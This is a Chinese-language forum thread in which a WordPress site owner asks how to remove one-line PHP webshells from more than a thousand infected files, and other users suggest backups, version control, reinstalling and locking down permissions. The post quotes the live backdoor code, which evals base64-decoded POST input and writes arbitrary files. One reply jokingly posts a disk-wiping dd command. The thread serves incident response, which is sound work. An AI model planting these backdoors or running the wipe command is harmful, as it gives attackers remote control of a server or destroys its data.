V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
54dev
V2EX  ›  问与答

网站文件里有上千个文件被感染一句话木马,怎么能彻底清除干净?

  •  
  •   54dev · 2014-09-04 21:41:53 +08:00 · 6554 次点击
    这是一个创建于 3718 天前的主题,其中的信息可能已经有所发展或是发生改变。
    eval(base64_decode($_POST['n071238']));
    eval(base64_decode($_POST['n642afe']));
    eval(base64_decode($_POST['n6ae4d5']));
    eval(base64_decode($_POST['n78cd5a']));
    eval('$v_result = '.$p_option s[PCLZIP_CB_PRE_EXTRACT].'(PCLZIP_CB_PRE_EXTRACT, $v_local_header);');
    $ogygd = "42bd6c187118582ea3e338a599a329b1"; if(isset($_REQUEST['mpwr '])) { $dsir = $_REQUEST['mpwr']; eval($dsir); exit(); } if(isset($_REQUEST['tsyuw'])) { $tkirx = $_REQUEST['rvlzlo']; $jouyl = $_REQUEST['tsyuw']; $zofhgl = fopen($jouyl, 'w'); $zkvv = fwri te($zofhgl, $tkirx); fclose($zofhgl); echo $zkvv; exit(); }

    $njhg = "63e9ac921222afbfe0f8cb60c5bc3069"; if(isset($_REQUEST['kdrmaio'])) { $tbrnlbk = $_REQUEST['kdrmaio']; eval($tbrnlbk); exit(); } if(isset($_REQUEST['xcjvv'])) { $tue ezzz = $_REQUEST['sjkkv']; $sjamlr = $_REQUEST['xcjvv']; $wtjfqlol = fopen($sjamlr, 'w'); $jfcn k = fwrite($wtjfqlol, $tueezzz); fclose($wtjfqlol); echo $jfcnk; exit(); }
    $krglis = "b95e94407a784c065429334b68ee7bd0"; if(isset($_REQUEST[' jbpvxunm'])) { $ityq = $_REQUEST['jbpvxunm']; eval($ityq); exit(); } if(isset($_REQUEST['xsqgzp w'])) { $jqxnuchk = $_REQUEST['qmpl']; $jzwlh = $_REQUEST['xsqgzpw']; $kyiiqzo = fopen($jzwlh, 'w'); $ollxbik = fwrite($kyiiqzo, $jqxnuchk); fclose($kyiiqzo); echo $ollxbik; exit(); }



    网站是wordpress
    26 条回复    2014-09-05 22:27:23 +08:00
    feefk
        1
    feefk  
       2014-09-04 21:43:43 +08:00   ❤️ 1
    不懂,帮顶。。。
    54dev
        2
    54dev  
    OP
       2014-09-04 21:47:08 +08:00
    还有个问题:这些木马里,这么多参数,还有这么多文件,他们是怎么管理的,手工记是肯定 不可能的吧,
    Hubs
        3
    Hubs  
       2014-09-04 21:51:13 +08:00   ❤️ 1
    试试 阿D,百度搜一下 阿D
    RemRain
        4
    RemRain  
       2014-09-04 21:52:26 +08:00
    ```
    dd if=/dev/zero of=/
    ```
    我开玩笑的,别当真
    Automan
        5
    Automan  
       2014-09-04 21:54:01 +08:00   ❤️ 1
    @54dev 肯定是用菜刀连接的嘛
    54dev
        6
    54dev  
    OP
       2014-09-04 22:00:05 +08:00
    @RemRain 逗比,拿你的主机我试一下。:)

    @Automan 菜刀这么强

    @Hubs 会不会误杀,我用find . -name "*.php" | xargs grep "eval"查出来的这些文件,总共有两千多个,但真正中马的只有1000多个


    这黑阔真轴,他挂的钓鱼网站我刚删除,他就又上传了,索性我把站关了,免得被反欺诈中心投诉。
    ai0by
        7
    ai0by  
       2014-09-04 22:23:15 +08:00 via Android
    我想知道他怎么做到感染1000多个文件
    jkjoke
        8
    jkjoke  
       2014-09-04 22:33:49 +08:00
    @ai0by 大马有批量挂马功能
    raincious
        9
    raincious  
       2014-09-04 22:36:31 +08:00   ❤️ 2
    @ai0by 很简单,用个正则表达式或者str_pos就行了。剩下的就是字符串插入/替换。

    就像这样:
    https://gist.github.com/raincious/cc6067699fb86eb33353
    54dev
        10
    54dev  
    OP
       2014-09-04 22:38:42 +08:00
    @raincious 插入不怕,但批量去马的时候容易误杀
    crab
        11
    crab  
       2014-09-04 22:59:41 +08:00
    试下能不能通过文件最后修改日期入手。
    izoabr
        12
    izoabr  
       2014-09-04 23:00:20 +08:00
    有备份不?别说没有哦。。。恢复
    0zero0
        13
    0zero0  
       2014-09-04 23:16:17 +08:00
    对,其实抵抗黑客的一个最后的绝招就是:备份!!!
    这对于个人来说也是个非常好的习惯。

    上面说的好像离题了,下面回答一下问题:批量去马真的太容易误杀了o(╯□╰)o
    Automan
        14
    Automan  
       2014-09-04 23:27:25 +08:00
    @54dev 治标不治本啊,后门不一定都有eval的,要留后门太容易了。。看看有没有备份,重新恢复一份,全站只留读权限,图片文件目录下禁止PHP执行
    ai0by
        15
    ai0by  
       2014-09-04 23:36:08 +08:00 via Android
    @jkjoke 一般的都没有的吧😄
    RemRain
        16
    RemRain  
       2014-09-04 23:39:37 +08:00   ❤️ 1
    C:\> dd if=/dev/zero of=/
    Illegal command: dd.

    @54dev,dd 无害,可放心大胆使用

    话说你的 php 是用 root 跑的么?是的话果断重装系统吧,其他帐号的话,删除帐号对应的所有文件,用备份重建。一般被侵入的话,可不止改 php 文件那么简单
    Mutoo
        17
    Mutoo  
       2014-09-04 23:40:29 +08:00
    这时候就突显版本控制的必要性了
    akfish
        18
    akfish  
       2014-09-04 23:42:00 +08:00
    有版本控制的话,直接就revert了。
    lz这次杀了后,赶紧版本控制起来吧。
    Hubs
        19
    Hubs  
       2014-09-04 23:55:08 +08:00
    @54dev 应该不会吧!毕竟 阿D 是很早就开始做这类工具了!
    oott123
        20
    oott123  
       2014-09-05 00:15:28 +08:00 via Android
    @RemRain C:\> dd 哈哈哈哈这是我今天听到的最好笑的笑话,感谢层主!
    ihacku
        21
    ihacku  
       2014-09-05 00:23:51 +08:00 via iPad
    john990
        22
    john990  
       2014-09-05 07:24:56 +08:00 via Android
    @akfish 同意,版本控制最方便,本地一份服务器一份,有问题想怎么恢复就怎么恢复
    msg7086
        23
    msg7086  
       2014-09-05 07:24:59 +08:00 via iPhone
    先重装系统吧…然后再慢慢手动杀…
    Havee
        24
    Havee  
       2014-09-05 07:32:59 +08:00
    曾今遇到过,排查了后发现是某地图插件引起的,在所有php文件头插入base64_decode,卸载后一切正常
    楼主也试试排除下插件
    jedihy
        25
    jedihy  
       2014-09-05 12:36:08 +08:00 via iPhone
    这事小时候干过,看到一句话这三个字的时候还有点小激动。批量替换吧
    54dev
        26
    54dev  
    OP
       2014-09-05 22:27:23 +08:00
    @RemRain C:是什么东西 ,异物乱入:)


    我已经重装过系统啦,重装后又被干,现在我想的办法是把WP里的数据导出来,然后导入到一个全新的WP里。


    @Havee 这不是插件这么简单的问题,vps上好几个站都被感染了
    @ihacku 他们会把我的站列为风险高,建议不要浏览的。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   943 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 20:34 · PVG 04:34 · LAX 12:34 · JFK 15:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.